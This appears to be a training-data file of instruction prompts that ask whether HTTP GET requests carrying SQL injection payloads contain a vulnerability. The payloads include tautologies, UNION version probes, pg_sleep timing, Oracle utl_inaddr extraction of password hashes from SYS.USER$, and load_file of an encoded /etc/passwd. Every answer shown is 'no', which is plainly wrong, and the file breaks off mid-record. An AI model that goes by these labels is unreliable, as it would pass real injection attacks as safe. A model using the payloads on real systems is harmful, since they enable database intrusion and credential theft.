prompt
stringlengths 436
11.2k
|
---|
<s> [INST]Does the following http payload contain a vulnerability, answer yes or no ?{
"method": "GET",
"uri": "/?test=" or pg_sleep ( __TIME__ ) --",
"headers": {
"User-Agent": "PostmanRuntime/7.29.0",
"Accept": "*/*",
"Postman-Token": "4b946773-8e4c-4339-974d-1d69d0fccbb1",
"Host": "localhost:8080",
"Accept-Encoding": "gzip, deflate, br",
"Connection": "keep-alive",
"Test-Header": "" or pg_sleep ( __TIME__ ) --"
},
"payload": null
}[/INST] no </s>
|
<s> [INST]Does the following http payload contain a vulnerability, answer yes or no ?{
"method": "GET",
"uri": "/?test=create user name identified by pass123 temporary tablespace temp default tablespace users;",
"headers": {
"User-Agent": "PostmanRuntime/7.29.0",
"Accept": "*/*",
"Postman-Token": "4b946773-8e4c-4339-974d-1d69d0fccbb1",
"Host": "localhost:8080",
"Accept-Encoding": "gzip, deflate, br",
"Connection": "keep-alive",
"Test-Header": "create user name identified by pass123 temporary tablespace temp default tablespace users;"
},
"payload": null
}[/INST] no </s>
|
<s> [INST]Does the following http payload contain a vulnerability, answer yes or no ?{
"method": "GET",
"uri": "/?test= AND 1 = utl_inaddr.get_host_address ( ( SELECT DISTINCT ( table_name ) FROM ( SELECT DISTINCT ( table_name ) , ROWNUM AS LIMIT FROM sys.all_tables ) WHERE LIMIT = 5 ) ) AND 'i' = 'i",
"headers": {
"User-Agent": "PostmanRuntime/7.29.0",
"Accept": "*/*",
"Postman-Token": "4b946773-8e4c-4339-974d-1d69d0fccbb1",
"Host": "localhost:8080",
"Accept-Encoding": "gzip, deflate, br",
"Connection": "keep-alive",
"Test-Header": " AND 1 = utl_inaddr.get_host_address ( ( SELECT DISTINCT ( table_name ) FROM ( SELECT DISTINCT ( table_name ) , ROWNUM AS LIMIT FROM sys.all_tables ) WHERE LIMIT = 5 ) ) AND 'i' = 'i"
},
"payload": null
}[/INST] no </s>
|
<s> [INST]Does the following http payload contain a vulnerability, answer yes or no ?{
"method": "GET",
"uri": "/?test= select * from users where id = '1' or @ @1 = 1 union select 1,version ( ) -- 1'",
"headers": {
"User-Agent": "PostmanRuntime/7.29.0",
"Accept": "*/*",
"Postman-Token": "4b946773-8e4c-4339-974d-1d69d0fccbb1",
"Host": "localhost:8080",
"Accept-Encoding": "gzip, deflate, br",
"Connection": "keep-alive",
"Test-Header": " select * from users where id = '1' or @ @1 = 1 union select 1,version ( ) -- 1'"
},
"payload": null
}[/INST] no </s>
|
<s> [INST]Does the following http payload contain a vulnerability, answer yes or no ?{
"method": "GET",
"uri": "/?test= select * from users where id = 1 or 1#" ( union select 1,version ( ) -- 1",
"headers": {
"User-Agent": "PostmanRuntime/7.29.0",
"Accept": "*/*",
"Postman-Token": "4b946773-8e4c-4339-974d-1d69d0fccbb1",
"Host": "localhost:8080",
"Accept-Encoding": "gzip, deflate, br",
"Connection": "keep-alive",
"Test-Header": " select * from users where id = 1 or 1#" ( union select 1,version ( ) -- 1"
},
"payload": null
}[/INST] no </s>
|
<s> [INST]Does the following http payload contain a vulnerability, answer yes or no ?{
"method": "GET",
"uri": "/?test= select name from syscolumns where id = ( select id from sysobjects where name = tablename' ) --",
"headers": {
"User-Agent": "PostmanRuntime/7.29.0",
"Accept": "*/*",
"Postman-Token": "4b946773-8e4c-4339-974d-1d69d0fccbb1",
"Host": "localhost:8080",
"Accept-Encoding": "gzip, deflate, br",
"Connection": "keep-alive",
"Test-Header": " select name from syscolumns where id = ( select id from sysobjects where name = tablename' ) --"
},
"payload": null
}[/INST] no </s>
|
<s> [INST]Does the following http payload contain a vulnerability, answer yes or no ?{
"method": "GET",
"uri": "/?test=select * from users where id = 1 +$+ or 1 = 1 -- 1",
"headers": {
"User-Agent": "PostmanRuntime/7.29.0",
"Accept": "*/*",
"Postman-Token": "4b946773-8e4c-4339-974d-1d69d0fccbb1",
"Host": "localhost:8080",
"Accept-Encoding": "gzip, deflate, br",
"Connection": "keep-alive",
"Test-Header": "select * from users where id = 1 +$+ or 1 = 1 -- 1"
},
"payload": null
}[/INST] no </s>
|
<s> [INST]Does the following http payload contain a vulnerability, answer yes or no ?{
"method": "GET",
"uri": "/?test=1; ( load_file ( char ( 47,101,116,99,47,112,97,115,115,119,100 ) ) ) ,1,1,1;",
"headers": {
"User-Agent": "PostmanRuntime/7.29.0",
"Accept": "*/*",
"Postman-Token": "4b946773-8e4c-4339-974d-1d69d0fccbb1",
"Host": "localhost:8080",
"Accept-Encoding": "gzip, deflate, br",
"Connection": "keep-alive",
"Test-Header": "1; ( load_file ( char ( 47,101,116,99,47,112,97,115,115,119,100 ) ) ) ,1,1,1;"
},
"payload": null
}[/INST] no </s>
|
<s> [INST]Does the following http payload contain a vulnerability, answer yes or no ?{
"method": "GET",
"uri": "/?test= select * from users where id = '1' or ||/1 = 1 union select 1,version ( ) -- 1'",
"headers": {
"User-Agent": "PostmanRuntime/7.29.0",
"Accept": "*/*",
"Postman-Token": "4b946773-8e4c-4339-974d-1d69d0fccbb1",
"Host": "localhost:8080",
"Accept-Encoding": "gzip, deflate, br",
"Connection": "keep-alive",
"Test-Header": " select * from users where id = '1' or ||/1 = 1 union select 1,version ( ) -- 1'"
},
"payload": null
}[/INST] no </s>
|
<s> [INST]Does the following http payload contain a vulnerability, answer yes or no ?{
"method": "GET",
"uri": "/?test= select * from users where id = '1' or \.<\ union select 1,@@VERSION -- 1'",
"headers": {
"User-Agent": "PostmanRuntime/7.29.0",
"Accept": "*/*",
"Postman-Token": "4b946773-8e4c-4339-974d-1d69d0fccbb1",
"Host": "localhost:8080",
"Accept-Encoding": "gzip, deflate, br",
"Connection": "keep-alive",
"Test-Header": " select * from users where id = '1' or \.<\ union select 1,@@VERSION -- 1'"
},
"payload": null
}[/INST] no </s>
|
<s> [INST]Does the following http payload contain a vulnerability, answer yes or no ?{
"method": "GET",
"uri": "/?test=? or 1 = 1 --",
"headers": {
"User-Agent": "PostmanRuntime/7.29.0",
"Accept": "*/*",
"Postman-Token": "4b946773-8e4c-4339-974d-1d69d0fccbb1",
"Host": "localhost:8080",
"Accept-Encoding": "gzip, deflate, br",
"Connection": "keep-alive",
"Test-Header": "? or 1 = 1 --"
},
"payload": null
}[/INST] no </s>
|
<s> [INST]Does the following http payload contain a vulnerability, answer yes or no ?{
"method": "GET",
"uri": "/?test= ) or ( 'a' = 'a",
"headers": {
"User-Agent": "PostmanRuntime/7.29.0",
"Accept": "*/*",
"Postman-Token": "4b946773-8e4c-4339-974d-1d69d0fccbb1",
"Host": "localhost:8080",
"Accept-Encoding": "gzip, deflate, br",
"Connection": "keep-alive",
"Test-Header": " ) or ( 'a' = 'a"
},
"payload": null
}[/INST] no </s>
|
<s> [INST]Does the following http payload contain a vulnerability, answer yes or no ?{
"method": "GET",
"uri": "/?test=admin' or 1 = 1#",
"headers": {
"User-Agent": "PostmanRuntime/7.29.0",
"Accept": "*/*",
"Postman-Token": "4b946773-8e4c-4339-974d-1d69d0fccbb1",
"Host": "localhost:8080",
"Accept-Encoding": "gzip, deflate, br",
"Connection": "keep-alive",
"Test-Header": "admin' or 1 = 1#"
},
"payload": null
}[/INST] no </s>
|
<s> [INST]Does the following http payload contain a vulnerability, answer yes or no ?{
"method": "GET",
"uri": "/?test= select * from users where id = 1 or " ( ]" or 1 = 1 -- 1",
"headers": {
"User-Agent": "PostmanRuntime/7.29.0",
"Accept": "*/*",
"Postman-Token": "4b946773-8e4c-4339-974d-1d69d0fccbb1",
"Host": "localhost:8080",
"Accept-Encoding": "gzip, deflate, br",
"Connection": "keep-alive",
"Test-Header": " select * from users where id = 1 or " ( ]" or 1 = 1 -- 1"
},
"payload": null
}[/INST] no </s>
|
<s> [INST]Does the following http payload contain a vulnerability, answer yes or no ?{
"method": "GET",
"uri": "/?test=or 1 = 1 --",
"headers": {
"User-Agent": "PostmanRuntime/7.29.0",
"Accept": "*/*",
"Postman-Token": "4b946773-8e4c-4339-974d-1d69d0fccbb1",
"Host": "localhost:8080",
"Accept-Encoding": "gzip, deflate, br",
"Connection": "keep-alive",
"Test-Header": "or 1 = 1 --"
},
"payload": null
}[/INST] no </s>
|
<s> [INST]Does the following http payload contain a vulnerability, answer yes or no ?{
"method": "GET",
"uri": "/?test= AND 1 = utl_inaddr.get_host_address ( ( SELECT DISTINCT ( column_name ) FROM ( SELECT DISTINCT ( column_name ) , ROWNUM AS LIMIT FROM all_tab_columns ) WHERE LIMIT = 5 ) ) AND 'i' = 'i",
"headers": {
"User-Agent": "PostmanRuntime/7.29.0",
"Accept": "*/*",
"Postman-Token": "4b946773-8e4c-4339-974d-1d69d0fccbb1",
"Host": "localhost:8080",
"Accept-Encoding": "gzip, deflate, br",
"Connection": "keep-alive",
"Test-Header": " AND 1 = utl_inaddr.get_host_address ( ( SELECT DISTINCT ( column_name ) FROM ( SELECT DISTINCT ( column_name ) , ROWNUM AS LIMIT FROM all_tab_columns ) WHERE LIMIT = 5 ) ) AND 'i' = 'i"
},
"payload": null
}[/INST] no </s>
|
<s> [INST]Does the following http payload contain a vulnerability, answer yes or no ?{
"method": "GET",
"uri": "/?test= select * from users where id = '1' %!<@ union select 1,version ( ) -- 1'",
"headers": {
"User-Agent": "PostmanRuntime/7.29.0",
"Accept": "*/*",
"Postman-Token": "4b946773-8e4c-4339-974d-1d69d0fccbb1",
"Host": "localhost:8080",
"Accept-Encoding": "gzip, deflate, br",
"Connection": "keep-alive",
"Test-Header": " select * from users where id = '1' %!<@ union select 1,version ( ) -- 1'"
},
"payload": null
}[/INST] no </s>
|
<s> [INST]Does the following http payload contain a vulnerability, answer yes or no ?{
"method": "GET",
"uri": "/?test= select * from users where id = 1 or "& ( " or 1 = 1 -- 1",
"headers": {
"User-Agent": "PostmanRuntime/7.29.0",
"Accept": "*/*",
"Postman-Token": "4b946773-8e4c-4339-974d-1d69d0fccbb1",
"Host": "localhost:8080",
"Accept-Encoding": "gzip, deflate, br",
"Connection": "keep-alive",
"Test-Header": " select * from users where id = 1 or "& ( " or 1 = 1 -- 1"
},
"payload": null
}[/INST] no </s>
|
<s> [INST]Does the following http payload contain a vulnerability, answer yes or no ?{
"method": "GET",
"uri": "/?test= select * from users where id = 1 or "? ( " or 1 = 1 -- 1",
"headers": {
"User-Agent": "PostmanRuntime/7.29.0",
"Accept": "*/*",
"Postman-Token": "4b946773-8e4c-4339-974d-1d69d0fccbb1",
"Host": "localhost:8080",
"Accept-Encoding": "gzip, deflate, br",
"Connection": "keep-alive",
"Test-Header": " select * from users where id = 1 or "? ( " or 1 = 1 -- 1"
},
"payload": null
}[/INST] no </s>
|
<s> [INST]Does the following http payload contain a vulnerability, answer yes or no ?{
"method": "GET",
"uri": "/?test=distinct",
"headers": {
"User-Agent": "PostmanRuntime/7.29.0",
"Accept": "*/*",
"Postman-Token": "4b946773-8e4c-4339-974d-1d69d0fccbb1",
"Host": "localhost:8080",
"Accept-Encoding": "gzip, deflate, br",
"Connection": "keep-alive",
"Test-Header": "distinct"
},
"payload": null
}[/INST] no </s>
|
<s> [INST]Does the following http payload contain a vulnerability, answer yes or no ?{
"method": "GET",
"uri": "/?test=select * from users where id = '1' * ( \ ) or 1 = 1 -- 1'",
"headers": {
"User-Agent": "PostmanRuntime/7.29.0",
"Accept": "*/*",
"Postman-Token": "4b946773-8e4c-4339-974d-1d69d0fccbb1",
"Host": "localhost:8080",
"Accept-Encoding": "gzip, deflate, br",
"Connection": "keep-alive",
"Test-Header": "select * from users where id = '1' * ( \ ) or 1 = 1 -- 1'"
},
"payload": null
}[/INST] no </s>
|
<s> [INST]Does the following http payload contain a vulnerability, answer yes or no ?{
"method": "GET",
"uri": "/?test=1 and ascii ( lower ( substring ( ( select top 1 name from sysobjects where xtype = 'u' ) , 1, 1 ) ) ) > 116",
"headers": {
"User-Agent": "PostmanRuntime/7.29.0",
"Accept": "*/*",
"Postman-Token": "4b946773-8e4c-4339-974d-1d69d0fccbb1",
"Host": "localhost:8080",
"Accept-Encoding": "gzip, deflate, br",
"Connection": "keep-alive",
"Test-Header": "1 and ascii ( lower ( substring ( ( select top 1 name from sysobjects where xtype = 'u' ) , 1, 1 ) ) ) > 116"
},
"payload": null
}[/INST] no </s>
|
<s> [INST]Does the following http payload contain a vulnerability, answer yes or no ?{
"method": "GET",
"uri": "/?test=select * from users where id = 1 or \.<\ or 1 = 1 -- 1",
"headers": {
"User-Agent": "PostmanRuntime/7.29.0",
"Accept": "*/*",
"Postman-Token": "4b946773-8e4c-4339-974d-1d69d0fccbb1",
"Host": "localhost:8080",
"Accept-Encoding": "gzip, deflate, br",
"Connection": "keep-alive",
"Test-Header": "select * from users where id = 1 or \.<\ or 1 = 1 -- 1"
},
"payload": null
}[/INST] no </s>
|
<s> [INST]Does the following http payload contain a vulnerability, answer yes or no ?{
"method": "GET",
"uri": "/?test=admin" or "1" = "1"--",
"headers": {
"User-Agent": "PostmanRuntime/7.29.0",
"Accept": "*/*",
"Postman-Token": "4b946773-8e4c-4339-974d-1d69d0fccbb1",
"Host": "localhost:8080",
"Accept-Encoding": "gzip, deflate, br",
"Connection": "keep-alive",
"Test-Header": "admin" or "1" = "1"--"
},
"payload": null
}[/INST] no </s>
|
<s> [INST]Does the following http payload contain a vulnerability, answer yes or no ?{
"method": "GET",
"uri": "/?test= select * from users where id = 1 or "%{" or 1 = 1 -- 1",
"headers": {
"User-Agent": "PostmanRuntime/7.29.0",
"Accept": "*/*",
"Postman-Token": "4b946773-8e4c-4339-974d-1d69d0fccbb1",
"Host": "localhost:8080",
"Accept-Encoding": "gzip, deflate, br",
"Connection": "keep-alive",
"Test-Header": " select * from users where id = 1 or "%{" or 1 = 1 -- 1"
},
"payload": null
}[/INST] no </s>
|
<s> [INST]Does the following http payload contain a vulnerability, answer yes or no ?{
"method": "GET",
"uri": "/?test=insert",
"headers": {
"User-Agent": "PostmanRuntime/7.29.0",
"Accept": "*/*",
"Postman-Token": "4b946773-8e4c-4339-974d-1d69d0fccbb1",
"Host": "localhost:8080",
"Accept-Encoding": "gzip, deflate, br",
"Connection": "keep-alive",
"Test-Header": "insert"
},
"payload": null
}[/INST] no </s>
|
<s> [INST]Does the following http payload contain a vulnerability, answer yes or no ?{
"method": "GET",
"uri": "/?test= select * from users where id = 1 or 1#"? = 1 or 1 = 1 -- 1",
"headers": {
"User-Agent": "PostmanRuntime/7.29.0",
"Accept": "*/*",
"Postman-Token": "4b946773-8e4c-4339-974d-1d69d0fccbb1",
"Host": "localhost:8080",
"Accept-Encoding": "gzip, deflate, br",
"Connection": "keep-alive",
"Test-Header": " select * from users where id = 1 or 1#"? = 1 or 1 = 1 -- 1"
},
"payload": null
}[/INST] no </s>
|
<s> [INST]Does the following http payload contain a vulnerability, answer yes or no ?{
"method": "GET",
"uri": "/?test= select * from users where id = 1 or "%?" or 1 = 1 -- 1",
"headers": {
"User-Agent": "PostmanRuntime/7.29.0",
"Accept": "*/*",
"Postman-Token": "4b946773-8e4c-4339-974d-1d69d0fccbb1",
"Host": "localhost:8080",
"Accept-Encoding": "gzip, deflate, br",
"Connection": "keep-alive",
"Test-Header": " select * from users where id = 1 or "%?" or 1 = 1 -- 1"
},
"payload": null
}[/INST] no </s>
|
<s> [INST]Does the following http payload contain a vulnerability, answer yes or no ?{
"method": "GET",
"uri": "/?test= AND 1 = utl_inaddr.get_host_address ( ( SELECT DISTINCT ( PASSWORD ) FROM ( SELECT DISTINCT ( PASSWORD ) , ROWNUM AS LIMIT FROM SYS.USER$ ) WHERE LIMIT = 8 ) ) AND 'i' = 'i",
"headers": {
"User-Agent": "PostmanRuntime/7.29.0",
"Accept": "*/*",
"Postman-Token": "4b946773-8e4c-4339-974d-1d69d0fccbb1",
"Host": "localhost:8080",
"Accept-Encoding": "gzip, deflate, br",
"Connection": "keep-alive",
"Test-Header": " AND 1 = utl_inaddr.get_host_address ( ( SELECT DISTINCT ( PASSWORD ) FROM ( SELECT DISTINCT ( PASSWORD ) , ROWNUM AS LIMIT FROM SYS.USER$ ) WHERE LIMIT = 8 ) ) AND 'i' = 'i"
},
"payload": null
}[/INST] no </s>
|
<s> [INST]Does the following http payload contain a vulnerability, answer yes or no ?{
"method": "GET",
"uri": "/?test= select * from users where id = 1 or "?#" or 1 = 1 -- 1",
"headers": {
"User-Agent": "PostmanRuntime/7.29.0",
"Accept": "*/*",
"Postman-Token": "4b946773-8e4c-4339-974d-1d69d0fccbb1",
"Host": "localhost:8080",
"Accept-Encoding": "gzip, deflate, br",
"Connection": "keep-alive",
"Test-Header": " select * from users where id = 1 or "?#" or 1 = 1 -- 1"
},
"payload": null
}[/INST] no </s>
|
<s> [INST]Does the following http payload contain a vulnerability, answer yes or no ?{
"method": "GET",
"uri": "/?test=or 1 = 1 or "" = ",
"headers": {
"User-Agent": "PostmanRuntime/7.29.0",
"Accept": "*/*",
"Postman-Token": "4b946773-8e4c-4339-974d-1d69d0fccbb1",
"Host": "localhost:8080",
"Accept-Encoding": "gzip, deflate, br",
"Connection": "keep-alive",
"Test-Header": "or 1 = 1 or "" = "
},
"payload": null
}[/INST] no </s>
|
<s> [INST]Does the following http payload contain a vulnerability, answer yes or no ?{
"method": "GET",
"uri": "/?test=/**/or/**/1/**/ = /**/1",
"headers": {
"User-Agent": "PostmanRuntime/7.29.0",
"Accept": "*/*",
"Postman-Token": "4b946773-8e4c-4339-974d-1d69d0fccbb1",
"Host": "localhost:8080",
"Accept-Encoding": "gzip, deflate, br",
"Connection": "keep-alive",
"Test-Header": "/**/or/**/1/**/ = /**/1"
},
"payload": null
}[/INST] no </s>
|
<s> [INST]Does the following http payload contain a vulnerability, answer yes or no ?{
"method": "GET",
"uri": "/?test= select * from users where id = 1 or ". ( " or 1 = 1 -- 1",
"headers": {
"User-Agent": "PostmanRuntime/7.29.0",
"Accept": "*/*",
"Postman-Token": "4b946773-8e4c-4339-974d-1d69d0fccbb1",
"Host": "localhost:8080",
"Accept-Encoding": "gzip, deflate, br",
"Connection": "keep-alive",
"Test-Header": " select * from users where id = 1 or ". ( " or 1 = 1 -- 1"
},
"payload": null
}[/INST] no </s>
|
<s> [INST]Does the following http payload contain a vulnerability, answer yes or no ?{
"method": "GET",
"uri": "/?test= select * from users where id = '1' union select ||/1,version ( ) -- 1'",
"headers": {
"User-Agent": "PostmanRuntime/7.29.0",
"Accept": "*/*",
"Postman-Token": "4b946773-8e4c-4339-974d-1d69d0fccbb1",
"Host": "localhost:8080",
"Accept-Encoding": "gzip, deflate, br",
"Connection": "keep-alive",
"Test-Header": " select * from users where id = '1' union select ||/1,version ( ) -- 1'"
},
"payload": null
}[/INST] no </s>
|
<s> [INST]Does the following http payload contain a vulnerability, answer yes or no ?{
"method": "GET",
"uri": "/?test= select * from users where id = '1' union select +\.,@@VERSION -- 1'",
"headers": {
"User-Agent": "PostmanRuntime/7.29.0",
"Accept": "*/*",
"Postman-Token": "4b946773-8e4c-4339-974d-1d69d0fccbb1",
"Host": "localhost:8080",
"Accept-Encoding": "gzip, deflate, br",
"Connection": "keep-alive",
"Test-Header": " select * from users where id = '1' union select +\.,@@VERSION -- 1'"
},
"payload": null
}[/INST] no </s>
|
<s> [INST]Does the following http payload contain a vulnerability, answer yes or no ?{
"method": "GET",
"uri": "/?test=or 1 = 1/*",
"headers": {
"User-Agent": "PostmanRuntime/7.29.0",
"Accept": "*/*",
"Postman-Token": "4b946773-8e4c-4339-974d-1d69d0fccbb1",
"Host": "localhost:8080",
"Accept-Encoding": "gzip, deflate, br",
"Connection": "keep-alive",
"Test-Header": "or 1 = 1/*"
},
"payload": null
}[/INST] no </s>
|
<s> [INST]Does the following http payload contain a vulnerability, answer yes or no ?{
"method": "GET",
"uri": "/?test=%27 or 1 = 1",
"headers": {
"User-Agent": "PostmanRuntime/7.29.0",
"Accept": "*/*",
"Postman-Token": "4b946773-8e4c-4339-974d-1d69d0fccbb1",
"Host": "localhost:8080",
"Accept-Encoding": "gzip, deflate, br",
"Connection": "keep-alive",
"Test-Header": "%27 or 1 = 1"
},
"payload": null
}[/INST] no </s>
|
<s> [INST]Does the following http payload contain a vulnerability, answer yes or no ?{
"method": "GET",
"uri": "/?test= select * from users where id = 1 <@&@ union select 1,version ( ) -- 1",
"headers": {
"User-Agent": "PostmanRuntime/7.29.0",
"Accept": "*/*",
"Postman-Token": "4b946773-8e4c-4339-974d-1d69d0fccbb1",
"Host": "localhost:8080",
"Accept-Encoding": "gzip, deflate, br",
"Connection": "keep-alive",
"Test-Header": " select * from users where id = 1 <@&@ union select 1,version ( ) -- 1"
},
"payload": null
}[/INST] no </s>
|
<s> [INST]Does the following http payload contain a vulnerability, answer yes or no ?{
"method": "GET",
"uri": "/?test= select * from users where id = '1' union select $*$,@@VERSION -- 1'",
"headers": {
"User-Agent": "PostmanRuntime/7.29.0",
"Accept": "*/*",
"Postman-Token": "4b946773-8e4c-4339-974d-1d69d0fccbb1",
"Host": "localhost:8080",
"Accept-Encoding": "gzip, deflate, br",
"Connection": "keep-alive",
"Test-Header": " select * from users where id = '1' union select $*$,@@VERSION -- 1'"
},
"payload": null
}[/INST] no </s>
|
<s> [INST]Does the following http payload contain a vulnerability, answer yes or no ?{
"method": "GET",
"uri": "/?test=1; ( load_file ( char ( 47,101,116,99,47,112,97,115, ...",
"headers": {
"User-Agent": "PostmanRuntime/7.29.0",
"Accept": "*/*",
"Postman-Token": "4b946773-8e4c-4339-974d-1d69d0fccbb1",
"Host": "localhost:8080",
"Accept-Encoding": "gzip, deflate, br",
"Connection": "keep-alive",
"Test-Header": "1; ( load_file ( char ( 47,101,116,99,47,112,97,115, ..."
},
"payload": null
}[/INST] no </s>
|
<s> [INST]Does the following http payload contain a vulnerability, answer yes or no ?{
"method": "GET",
"uri": "/?test= select * from users where id = '1' or $ 1 = 1 union select 1,@@VERSION -- 1'",
"headers": {
"User-Agent": "PostmanRuntime/7.29.0",
"Accept": "*/*",
"Postman-Token": "4b946773-8e4c-4339-974d-1d69d0fccbb1",
"Host": "localhost:8080",
"Accept-Encoding": "gzip, deflate, br",
"Connection": "keep-alive",
"Test-Header": " select * from users where id = '1' or $ 1 = 1 union select 1,@@VERSION -- 1'"
},
"payload": null
}[/INST] no </s>
|
<s> [INST]Does the following http payload contain a vulnerability, answer yes or no ?{
"method": "GET",
"uri": "/?test=select * from users where id = 1 or \.<1 or 1 = 1 -- 1",
"headers": {
"User-Agent": "PostmanRuntime/7.29.0",
"Accept": "*/*",
"Postman-Token": "4b946773-8e4c-4339-974d-1d69d0fccbb1",
"Host": "localhost:8080",
"Accept-Encoding": "gzip, deflate, br",
"Connection": "keep-alive",
"Test-Header": "select * from users where id = 1 or \.<1 or 1 = 1 -- 1"
},
"payload": null
}[/INST] no </s>
|
<s> [INST]Does the following http payload contain a vulnerability, answer yes or no ?{
"method": "GET",
"uri": "/?test= select * from users where id = '1' or \<\ union select 1,@@VERSION -- 1'",
"headers": {
"User-Agent": "PostmanRuntime/7.29.0",
"Accept": "*/*",
"Postman-Token": "4b946773-8e4c-4339-974d-1d69d0fccbb1",
"Host": "localhost:8080",
"Accept-Encoding": "gzip, deflate, br",
"Connection": "keep-alive",
"Test-Header": " select * from users where id = '1' or \<\ union select 1,@@VERSION -- 1'"
},
"payload": null
}[/INST] no </s>
|
<s> [INST]Does the following http payload contain a vulnerability, answer yes or no ?{
"method": "GET",
"uri": "/?test= select * from users where id = 1 union select 1||1,version ( ) -- 1",
"headers": {
"User-Agent": "PostmanRuntime/7.29.0",
"Accept": "*/*",
"Postman-Token": "4b946773-8e4c-4339-974d-1d69d0fccbb1",
"Host": "localhost:8080",
"Accept-Encoding": "gzip, deflate, br",
"Connection": "keep-alive",
"Test-Header": " select * from users where id = 1 union select 1||1,version ( ) -- 1"
},
"payload": null
}[/INST] no </s>
|
<s> [INST]Does the following http payload contain a vulnerability, answer yes or no ?{
"method": "GET",
"uri": "/?test= select * from users where id = 1 ||1 union select null,banner from v$version where rownum = 1 -- 1",
"headers": {
"User-Agent": "PostmanRuntime/7.29.0",
"Accept": "*/*",
"Postman-Token": "4b946773-8e4c-4339-974d-1d69d0fccbb1",
"Host": "localhost:8080",
"Accept-Encoding": "gzip, deflate, br",
"Connection": "keep-alive",
"Test-Header": " select * from users where id = 1 ||1 union select null,banner from v$version where rownum = 1 -- 1"
},
"payload": null
}[/INST] no </s>
|
<s> [INST]Does the following http payload contain a vulnerability, answer yes or no ?{
"method": "GET",
"uri": "/?test=select * from users where id = '1' or \.<\ or 1 = 1 -- 1'",
"headers": {
"User-Agent": "PostmanRuntime/7.29.0",
"Accept": "*/*",
"Postman-Token": "4b946773-8e4c-4339-974d-1d69d0fccbb1",
"Host": "localhost:8080",
"Accept-Encoding": "gzip, deflate, br",
"Connection": "keep-alive",
"Test-Header": "select * from users where id = '1' or \.<\ or 1 = 1 -- 1'"
},
"payload": null
}[/INST] no </s>
|
<s> [INST]Does the following http payload contain a vulnerability, answer yes or no ?{
"method": "GET",
"uri": "/?test= select * from users where id = 1 or "]{" or 1 = 1 -- 1",
"headers": {
"User-Agent": "PostmanRuntime/7.29.0",
"Accept": "*/*",
"Postman-Token": "4b946773-8e4c-4339-974d-1d69d0fccbb1",
"Host": "localhost:8080",
"Accept-Encoding": "gzip, deflate, br",
"Connection": "keep-alive",
"Test-Header": " select * from users where id = 1 or "]{" or 1 = 1 -- 1"
},
"payload": null
}[/INST] no </s>
|
<s> [INST]Does the following http payload contain a vulnerability, answer yes or no ?{
"method": "GET",
"uri": "/?test= select * from users where id = 1 or ".@" or 1 = 1 -- 1",
"headers": {
"User-Agent": "PostmanRuntime/7.29.0",
"Accept": "*/*",
"Postman-Token": "4b946773-8e4c-4339-974d-1d69d0fccbb1",
"Host": "localhost:8080",
"Accept-Encoding": "gzip, deflate, br",
"Connection": "keep-alive",
"Test-Header": " select * from users where id = 1 or ".@" or 1 = 1 -- 1"
},
"payload": null
}[/INST] no </s>
|
<s> [INST]Does the following http payload contain a vulnerability, answer yes or no ?{
"method": "GET",
"uri": "/?test= select * from users where id = 1 or "$[" or 1 = 1 -- 1",
"headers": {
"User-Agent": "PostmanRuntime/7.29.0",
"Accept": "*/*",
"Postman-Token": "4b946773-8e4c-4339-974d-1d69d0fccbb1",
"Host": "localhost:8080",
"Accept-Encoding": "gzip, deflate, br",
"Connection": "keep-alive",
"Test-Header": " select * from users where id = 1 or "$[" or 1 = 1 -- 1"
},
"payload": null
}[/INST] no </s>
|
<s> [INST]Does the following http payload contain a vulnerability, answer yes or no ?{
"method": "GET",
"uri": "/?test=or 1 --'",
"headers": {
"User-Agent": "PostmanRuntime/7.29.0",
"Accept": "*/*",
"Postman-Token": "4b946773-8e4c-4339-974d-1d69d0fccbb1",
"Host": "localhost:8080",
"Accept-Encoding": "gzip, deflate, br",
"Connection": "keep-alive",
"Test-Header": "or 1 --'"
},
"payload": null
}[/INST] no </s>
|
<s> [INST]Does the following http payload contain a vulnerability, answer yes or no ?{
"method": "GET",
"uri": "/?test= select * from users where id = 1 or ",;" or 1 = 1 -- 1",
"headers": {
"User-Agent": "PostmanRuntime/7.29.0",
"Accept": "*/*",
"Postman-Token": "4b946773-8e4c-4339-974d-1d69d0fccbb1",
"Host": "localhost:8080",
"Accept-Encoding": "gzip, deflate, br",
"Connection": "keep-alive",
"Test-Header": " select * from users where id = 1 or ",;" or 1 = 1 -- 1"
},
"payload": null
}[/INST] no </s>
|
<s> [INST]Does the following http payload contain a vulnerability, answer yes or no ?{
"method": "GET",
"uri": "/?test=admin" or 1 = 1#",
"headers": {
"User-Agent": "PostmanRuntime/7.29.0",
"Accept": "*/*",
"Postman-Token": "4b946773-8e4c-4339-974d-1d69d0fccbb1",
"Host": "localhost:8080",
"Accept-Encoding": "gzip, deflate, br",
"Connection": "keep-alive",
"Test-Header": "admin" or 1 = 1#"
},
"payload": null
}[/INST] no </s>
|
<s> [INST]Does the following http payload contain a vulnerability, answer yes or no ?{
"method": "GET",
"uri": "/?test= select * from users where id = 1 + ( 1 ) union select null,banner from v$version where rownum = 1 -- 1",
"headers": {
"User-Agent": "PostmanRuntime/7.29.0",
"Accept": "*/*",
"Postman-Token": "4b946773-8e4c-4339-974d-1d69d0fccbb1",
"Host": "localhost:8080",
"Accept-Encoding": "gzip, deflate, br",
"Connection": "keep-alive",
"Test-Header": " select * from users where id = 1 + ( 1 ) union select null,banner from v$version where rownum = 1 -- 1"
},
"payload": null
}[/INST] no </s>
|
<s> [INST]Does the following http payload contain a vulnerability, answer yes or no ?{
"method": "GET",
"uri": "/?test=\x27UNION SELECT",
"headers": {
"User-Agent": "PostmanRuntime/7.29.0",
"Accept": "*/*",
"Postman-Token": "4b946773-8e4c-4339-974d-1d69d0fccbb1",
"Host": "localhost:8080",
"Accept-Encoding": "gzip, deflate, br",
"Connection": "keep-alive",
"Test-Header": "\x27UNION SELECT"
},
"payload": null
}[/INST] no </s>
|
<s> [INST]Does the following http payload contain a vulnerability, answer yes or no ?{
"method": "GET",
"uri": "/?test=PRINT",
"headers": {
"User-Agent": "PostmanRuntime/7.29.0",
"Accept": "*/*",
"Postman-Token": "4b946773-8e4c-4339-974d-1d69d0fccbb1",
"Host": "localhost:8080",
"Accept-Encoding": "gzip, deflate, br",
"Connection": "keep-alive",
"Test-Header": "PRINT"
},
"payload": null
}[/INST] no </s>
|
<s> [INST]Does the following http payload contain a vulnerability, answer yes or no ?{
"method": "GET",
"uri": "/?test= select * from users where id = '1' union select ( \. ) ,@@VERSION -- 1'",
"headers": {
"User-Agent": "PostmanRuntime/7.29.0",
"Accept": "*/*",
"Postman-Token": "4b946773-8e4c-4339-974d-1d69d0fccbb1",
"Host": "localhost:8080",
"Accept-Encoding": "gzip, deflate, br",
"Connection": "keep-alive",
